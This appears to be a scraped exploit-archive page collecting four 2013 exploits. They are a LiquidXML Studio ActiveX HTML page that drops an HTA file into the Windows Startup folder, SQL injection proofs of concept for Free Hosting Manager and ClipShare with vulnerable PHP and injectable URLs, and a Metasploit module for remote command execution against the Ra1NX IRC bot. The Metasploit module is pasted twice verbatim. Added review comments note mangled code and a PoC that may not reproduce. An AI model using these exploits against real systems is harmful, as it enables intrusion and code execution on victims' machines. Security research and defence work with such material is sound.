
LiquidXML Studio 2010 ActiveX Remote 0-day

liquidXML-exploit

 

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<!-- Review note: this page instantiates the ActiveX control identified by the
     CLSID below and calls its OpenFile/AppendString methods with a relative
     path that resolves into the all-users Startup folder. Client-side
     mitigation is the ActiveX kill bit (Compatibility Flags) for this CLSID;
     the advisory text itself records "KillBitSet: False". On the host, file
     creation in the Startup folder by a browser process is the detection
     signal. -->
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>

 

Free Hosting Manager V2.0.2 Multiple SQLi

Free Hosting Manager V2.0.2 Genel SQL injection açığına ilişkin exploit

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi                                                                                                          
# Author        : Saadat Ullah , saadi_linux@rocketmail.com                               
# Author home  : http://security-geeks.blogspot.com
# Date          : 23/3/13   
# Vendors  : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php  
                                                                                     
-------------------------------------------------------------------------
 --- [ Multiple SQL injection] --- 
It is vulnerable to SQLi in many files; some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
(the clientuser cookie value is injectable)
http://localhost/free/clients/register.php --->  SQLi on all POST Fields.

Proof Of Concept
In home.php
home.php calls a function auth(), which looks like this:

if ((isset($_COOKIE[&#39;clientuser&#39;])) && isset($_COOKIE[&#39;clientpass&#39;]) && isset($_COOKIE[&#39;clientid&#39;])) {

// Cookie values are attacker-controlled input; they are copied verbatim into
// locals and object state and nothing here validates or escapes them before
// they reach the SQL string below.
$clientuser = $_COOKIE[&#39;clientuser&#39;];
$clientpass = $_COOKIE[&#39;clientpass&#39;];
$clientid = $_COOKIE[&#39;clientid&#39;];
$this-> clientuser = $_COOKIE[&#39;clientuser&#39;];
$this-> clientpass = $_COOKIE[&#39;clientpass&#39;];
$this-> clientid = $_COOKIE[&#39;clientid&#39;];
return true;

// NOTE(review): as excerpted, the query sits after the return and would be
// unreachable; that is probably a transcription artefact -- confirm the real
// ordering against the shipped source. The fix is a prepared statement
// (mysqli/PDO) with bound parameters, and the credentials should be verified
// against the database before the function reports success.
$dbquery = @mysql_query("SELECT * FROM clients WHERE id=&#39;$clientid&#39; AND username=&#39;$clientuser&#39; AND password=&#39;$clientpass&#39;") or die(mysql_error());


In Reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET[&#39;do&#39;] == "code")) {
// $code is interpolated unescaped into the query. Note the `||`: the branch
// is also taken for do=code when $code is not set at all (where $code is
// populated from is not shown in this excerpt). Bind it as a parameter.

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode=&#39;$code&#39;") 
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET[&#39;id&#39;])) && ($_GET[&#39;action&#39;] == "close") && ($_GET[&#39;confirm&#39;] == "true")) {
// The raw id from the query string is handed to closeticket(); presumably it
// is the $ticket interpolated unescaped into the SQL below (confirm inside
// closeticket()). An (int) cast at this boundary or a bound parameter closes it.
$fhm-> closeticket($_GET[&#39;id&#39;]);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id=&#39;$ticket&#39; AND clientid=&#39;$this-> clientid&#39;") or die(mysql_error());

In Viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET[&#39;id&#39;];
.
// $id goes straight from the query string into the SQL; cast it to int or bind it.
$getacct = mysql_query("SELECT * FROM orders WHERE id=&#39;$id&#39; AND clientid=&#39;$fhm-> clientid&#39;") or die(mysql_error());

In register.php

// stripslashes() is not an escaping function: it only removes backslashes
// (with magic_quotes_gpc on it undoes the one layer of escaping PHP added).
// Every field below is then interpolated into the INSERT unescaped; use a
// prepared statement with bound parameters. $md5pass suggests the password
// is stored as an MD5 digest -- that should move to password_hash() as well.
$firstname = stripslashes($_POST[&#39;first_name&#39;]);
$lastname = stripslashes($_POST[&#39;last_name&#39;]);
$company = stripslashes($_POST[&#39;company&#39;]);
$address = stripslashes($_POST[&#39;address&#39;]);
$address2 = stripslashes($_POST[&#39;address_2&#39;]);
$country = stripslashes($_POST[&#39;country&#39;]);
$city = stripslashes($_POST[&#39;city&#39;]);
$state = stripslashes($_POST[&#39;state_region&#39;]);
$postcode = stripslashes($_POST[&#39;postal_code&#39;]);
$telnumber = stripslashes($_POST[&#39;tel_number&#39;]);
$faxnumber = stripslashes($_POST[&#39;fax_number&#39;]);
$emailaddress = stripslashes($_POST[&#39;email_address&#39;]);
$username = stripslashes($_POST[&#39;username&#39;]);
$password1 = stripslashes($_POST[&#39;password&#39;]);
$password2 = stripslashes($_POST[&#39;confirm_password&#39;]);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES(&#39;&#39;, &#39;$username&#39;, &#39;$md5pass&#39;, &#39;$firstname&#39;, &#39;$lastname&#39;, &#39;$company&#39;, &#39;$address&#39;, &#39;$address2&#39;, &#39;$city&#39;, &#39;$country&#39;, &#39;$state&#39;, &#39;$postcode&#39;, &#39;$telnumber&#39;, &#39;$faxnumber&#39;, &#39;$emailaddress&#39;, &#39;$startingcredits&#39;, &#39;1&#39;, &#39;&#39;, &#39;&#39;, &#39;$timestamp&#39;) ") 

Only stripslashes() is applied, which does not protect against SQL injection.

#independent Pakistani Security Researcher


  

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection açığına ilişkin exploit

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Note : this vulnerability only works if a group has been added to the community
#Last Checked: 24 March 2013

#to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini)

==============================================================================================

#Vulnerable Script:
PHP script : members.php  on line 23 

=========================== BEGIN OF gmembers.php =============================================

 <?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require(&#39;include/config.php&#39;);
require(&#39;include/function.php&#39;);
require(&#39;classes/pagination.class.php&#39;);
require(&#39;language/&#39; .$_SESSION&#91;&#39;language&#39;&#93;. &#39;/gmembers.lang.php&#39;);

// NOTE(review): $gid is accepted only when is_numeric() passes, then run
// through mysql_real_escape_string() and single-quoted in the query. The
// advisory's PoC value "6 AND 1=1" fails is_numeric(), so $gid becomes NULL,
// the lookup matches nothing and the request is redirected to error.php -- the
// same outcome as "6 AND 1=2". From this excerpt alone the reported blind
// injection is not reproducible; the advisory also cites "members.php line 23",
// so the affected query may live elsewhere. Independently of that, an (int)
// cast or a bound parameter is the robust form for an id.
$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST&#91;&#39;gid&#39;&#93;) && is_numeric($_REQUEST&#91;&#39;gid&#39;&#93;) ) ? mysql_real_escape_string($_REQUEST&#91;&#39;gid&#39;&#93;) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID=&#39;" .$gid. "&#39; limit 1";
$rs     = $conn-> execute($sql);
if ( $conn-> Affected_Rows() == 1 ) {
    $urlkey     = $rs-> fields[&#39;gurl&#39;];
    $gname      = $rs-> fields[&#39;gname&#39;];
    $gupload    = $rs-> fields[&#39;gupload&#39;];
    $oid        = $rs-> fields[&#39;OID&#39;];
    STemplate::assign(&#39;gname&#39;, $gname);
    STemplate::assign(&#39;gurl&#39;, $urlkey);
    STemplate::assign(&#39;gupload&#39;, $gupload);
} else {
    // Missing/invalid group: close the session and bounce to the error page.
    session_write_close();
    header(&#39;Location: &#39; .$config[&#39;BASE_URL&#39;]. &#39;/error.php?type=group_missing&#39;);
    die();
}
...........................................;
...............................................
 
?> 

============================================================================================================


 
Poc :

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation :

 http://server/mavideo/gmembers.php?gid=6 AND 1=1
==>  returns the normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==>  returns a page with some errors (or nothing at all - a white page)



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	# Metasploit module for the "Ra1NX" PHP IRC bot. It joins the bot's IRC
	# server as an ordinary client and drives the bot with PRIVMSGs that use the
	# bot's public "@<directive>" call syntax (see #check and #ra1nx_command).
	#
	# NOTE(review): this listing is HTML-mangled -- quotes appear as &#39;, the
	# append operator as "< <", and the line terminators inside the IRC strings
	# have lost their escape characters. It does not parse as pasted; treat it
	# as a reference transcript rather than runnable code.
	#
	# Defender notes: on the wire this is plain IRC registration (PASS/NICK/USER)
	# followed by PRIVMSGs addressed to the bot nick whose text begins with that
	# nick and an "@<directive>"; a bot echoing an "@msg" token back is exactly
	# the signal #check relies on, and is what to alert on. Remediation is
	# removing the bot and its C2 channel from the host, not hardening IRC.
	include Msf::Exploit::Remote::Tcp

	# Module metadata plus the user-facing options:
	#   RPORT        IRC server port (default 6667)
	#   IRC_PASSWORD optional server password (sent as PASS when non-empty)
	#   NICK         nickname this module registers with
	#   RNICK        nickname of the target bot
	#   PHP_EXEC     PHP function name the bot is asked to call (default 'system')
	# @param info [Hash] module info merged via update_info
	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         =>
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     =>
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        =>
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      =>
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  =>
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	# Probe: registers with the IRC server, then asks the bot (via its "@msg"
	# directive) to relay a random 8-character token back to our nick. A reply
	# containing the token means the bot acted on an unauthenticated command.
	# @return [Exploit::CheckCode] Unknown when registration is refused
	#   (numerics 463/464), Vulnerable when the token is echoed, Safe otherwise
	def check
		connect

		response = register(sock)
		# 463 = ERR_NOPERMFORHOST, 464 = ERR_PASSWDMISMATCH: no point continuing.
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		# Raw server reply is dumped to the console for the operator.
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	# Writes +data+ to +sock+ and then drains the reply: repeated get_once(-1, 1)
	# reads (presumably a 1-second read timeout) until one returns nil or the
	# socket raises EOFError. The +data+ local is reused as the accumulator, so
	# the outgoing text is gone after the put.
	# @param sock [Rex::Socket] connected IRC socket
	# @param data [String] bytes to send
	# @return [String] everything read back, possibly empty
	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
			# End of stream is treated like "nothing more to read".
		end
		data
	end

	# IRC registration: optional PASS, then NICK and USER in a single write.
	# A NICK longer than 9 characters is replaced by a random 9-character one
	# (the classic IRC nick limit) and a warning is printed.
	# @param sock [Rex::Socket] connected IRC socket
	# @return [String] the server's reply as collected by send_msg
	def register(sock)
		msg = ""

		# PASS only when a non-empty password was configured.
		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	# Sends the encoded payload to the bot as "<RNICK> @<PHP_EXEC> <payload>"
	# inside a PRIVMSG addressed to RNICK.
	# @param sock [Rex::Socket] connected IRC socket
	# @return [String] the reply collected by send_msg
	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	# Sends QUIT without waiting for a reply.
	# @param sock [Rex::Socket] connected IRC socket
	def quit(sock)
		quit_msg = "QUIT :bye byern"
		sock.put(quit_msg)
	end

	# Main flow: connect, register (abort on 463/464), send the bot command,
	# QUIT and disconnect. The command's reply is not inspected.
	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Uzaktan Kod Çalıştırma Açığı

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require &#39;msf/core&#39;

class Metasploit3  < Msf::Exploit::Remote

	# Metasploit module for the "Ra1NX" PHP IRC bot. It joins the bot's IRC
	# server as an ordinary client and drives the bot with PRIVMSGs that use the
	# bot's public "@<directive>" call syntax (see #check and #ra1nx_command).
	#
	# NOTE(review): this listing is HTML-mangled -- quotes appear as &#39;, the
	# append operator as "< <", and the line terminators inside the IRC strings
	# have lost their escape characters. It does not parse as pasted; treat it
	# as a reference transcript rather than runnable code.
	#
	# Defender notes: on the wire this is plain IRC registration (PASS/NICK/USER)
	# followed by PRIVMSGs addressed to the bot nick whose text begins with that
	# nick and an "@<directive>"; a bot echoing an "@msg" token back is exactly
	# the signal #check relies on, and is what to alert on. Remediation is
	# removing the bot and its C2 channel from the host, not hardening IRC.
	include Msf::Exploit::Remote::Tcp

	# Module metadata plus the user-facing options:
	#   RPORT        IRC server port (default 6667)
	#   IRC_PASSWORD optional server password (sent as PASS when non-empty)
	#   NICK         nickname this module registers with
	#   RNICK        nickname of the target bot
	#   PHP_EXEC     PHP function name the bot is asked to call (default 'system')
	# @param info [Hash] module info merged via update_info
	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =>  &#39;"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution&#39;,
			&#39;Description&#39;    =>  %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			&#39;Author&#39;         => 
				[
					&#39;bwall  <bwall[at]openbwall.com> &#39; # Ra1NX analysis and Metasploit module
				],
			&#39;License&#39;        =>  MSF_LICENSE,
			&#39;References&#39;     => 
				[
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot&#39;],
					[&#39;URL&#39;, &#39;https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0&#39;],
					[&#39;URL&#39;, &#39;http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b&#39;]
				],
			&#39;Platform&#39;       =>  [ &#39;unix&#39;, &#39;win&#39;],
			&#39;Arch&#39;           =>  ARCH_CMD,
			&#39;Payload&#39;        => 
				{
					&#39;Space&#39;    =>  344,
					&#39;BadChars&#39; =>  &#39;&#39;,
					&#39;DisableNops&#39; =>  true,
					&#39;Compat&#39;      => 
						{
							&#39;PayloadType&#39; =>  &#39;cmd&#39;,
						}
				},
			&#39;Targets&#39;  => 
				[
					[ &#39;Ra1NX&#39;, { } ]
				],
			&#39;Privileged&#39;     =>  false,
			&#39;DisclosureDate&#39; =>  &#39;March 24 2013&#39;,
			&#39;DefaultTarget&#39;  =>  0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new(&#39;IRC_PASSWORD&#39;, [false, &#39;IRC Connection Password&#39;, &#39;&#39;]),
				OptString.new(&#39;NICK&#39;, [true, &#39;IRC Nickname&#39;, &#39;msf_user&#39;]),
				OptString.new(&#39;RNICK&#39;, [true, &#39;Nickname of Target IRC Bot&#39;, &#39;jhl1&#39;]),
				OptString.new(&#39;PHP_EXEC&#39;, [true, &#39;Function used to call payload&#39;, &#39;system&#39;])
			], self.class)
	end

	# Probe: registers with the IRC server, then asks the bot (via its "@msg"
	# directive) to relay a random 8-character token back to our nick. A reply
	# containing the token means the bot acted on an unauthenticated command.
	# @return [Exploit::CheckCode] Unknown when registration is refused
	#   (numerics 463/464), Vulnerable when the token is echoed, Safe otherwise
	def check
		connect

		response = register(sock)
		# 463 = ERR_NOPERMFORHOST, 464 = ERR_PASSWDMISMATCH: no point continuing.
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @msg #{datastore[&#39;NICK&#39;]} #{confirm_string}rn")
		# Raw server reply is dumped to the console for the operator.
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	# Writes +data+ to +sock+ and then drains the reply: repeated get_once(-1, 1)
	# reads (presumably a 1-second read timeout) until one returns nil or the
	# socket raises EOFError. The +data+ local is reused as the accumulator, so
	# the outgoing text is gone after the put.
	# @param sock [Rex::Socket] connected IRC socket
	# @param data [String] bytes to send
	# @return [String] everything read back, possibly empty
	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data  < < read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
			# End of stream is treated like "nothing more to read".
		end
		data
	end

	# IRC registration: optional PASS, then NICK and USER in a single write.
	# A NICK longer than 9 characters is replaced by a random 9-character one
	# (the classic IRC nick limit) and a warning is printed.
	# @param sock [Rex::Socket] connected IRC socket
	# @return [String] the server's reply as collected by send_msg
	def register(sock)
		msg = ""

		# PASS only when a non-empty password was configured.
		if datastore[&#39;IRC_PASSWORD&#39;] and not datastore[&#39;IRC_PASSWORD&#39;].empty?
			msg  < < "PASS #{datastore[&#39;IRC_PASSWORD&#39;]}rn"
		end

		if datastore[&#39;NICK&#39;].length >  9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore[&#39;NICK&#39;]
		end

		msg  < < "NICK #{nick}rn"
		msg  < < "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}rn"

		response = send_msg(sock,msg)
		return response
	end

	# Sends the encoded payload to the bot as "<RNICK> @<PHP_EXEC> <payload>"
	# inside a PRIVMSG addressed to RNICK.
	# @param sock [Rex::Socket] connected IRC socket
	# @return [String] the reply collected by send_msg
	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore[&#39;RNICK&#39;]} :#{datastore[&#39;RNICK&#39;]} @#{datastore[&#39;PHP_EXEC&#39;]} #{encoded}rn"
		response = send_msg(sock, command_msg)
		return response
	end

	# Sends QUIT without waiting for a reply.
	# @param sock [Rex::Socket] connected IRC socket
	def quit(sock)
		quit_msg = "QUIT :bye byern"
		sock.put(quit_msg)
	end

	# Main flow: connect, register (abort on 463/464), send the bot command,
	# QUIT and disconnect. The command's reply is not inspected.
	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end